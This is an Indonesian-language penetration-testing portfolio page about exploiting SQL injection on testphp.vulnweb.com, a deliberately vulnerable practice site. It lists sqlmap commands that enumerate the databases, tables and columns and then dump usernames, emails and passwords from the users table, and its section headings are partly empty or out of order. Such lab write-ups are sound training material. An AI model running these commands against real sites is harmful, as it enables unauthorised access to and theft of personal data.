Juhari
SQL Injection adalah jenis serangan yang mengeksploitasi kelemahan dalam cara aplikasi web menangani input pengguna. Penyerang dapat menyisipkan kode SQL berbahaya ke dalam input yang kemudian dieksekusi oleh database aplikasi. Hal ini dapat menyebabkan akses tidak sah ke data sensitif, modifikasi data,
Portfolio uji penetrasi ini dilakukan untuk mengidentifikasi dan mengeksploitasi potensi kerentanan SQL Injection pada website http://testphp.vulnweb.com/. Hasil pengujian menunjukkan bahwa website tersebut rentan terhadap SQL Injection, memungkinkan penyerang untuk mengakses data sensitif dalam database.
Website yang diuji
http://testphp.vulnweb.com/ adalah website yang sengaja dibuat untuk tujuan pengujian keamanan. Website ini mengandung kerentanan yang disengaja, termasuk kerentanan SQL Injection yang dieksploitasi dalam pengujian ini. Tujuan dari website ini adalah untuk memberikan lingkungan yang aman bagi para profesional keamanan untuk berlatih dan menguji keterampilan mereka dalam mengidentifikasi dan mengeksploitasi kerentanan.
Tujuan
Metodologi
Pengujian dilakukan menggunakan alat sqlmap, sebuah alat otomatis untuk mendeteksi dan mengeksploitasi kerentanan SQL Injection. Langkah-langkah yang dilakukan meliputi :
Rekomendasi
Perintah ini akan mencoba mengidentifikasi database yang digunakan website : sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
Jika pemindaian awal berhasil, lanjutkan dengan mencari tabel dalam database : sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart
Setelah menemukan tabel yang menarik, cari kolom di dalamnya. Sebagai contoh dengan menggunakan tabel users : sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users
Jika menemukan kolom yang sensitif (misalnya, berisi username dan password), coba ekstrak data dengan perintah ini : sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dump -C name,address,email,pass -T users
perintah ini akan nge dumpp data dari column name, address, email dan pass.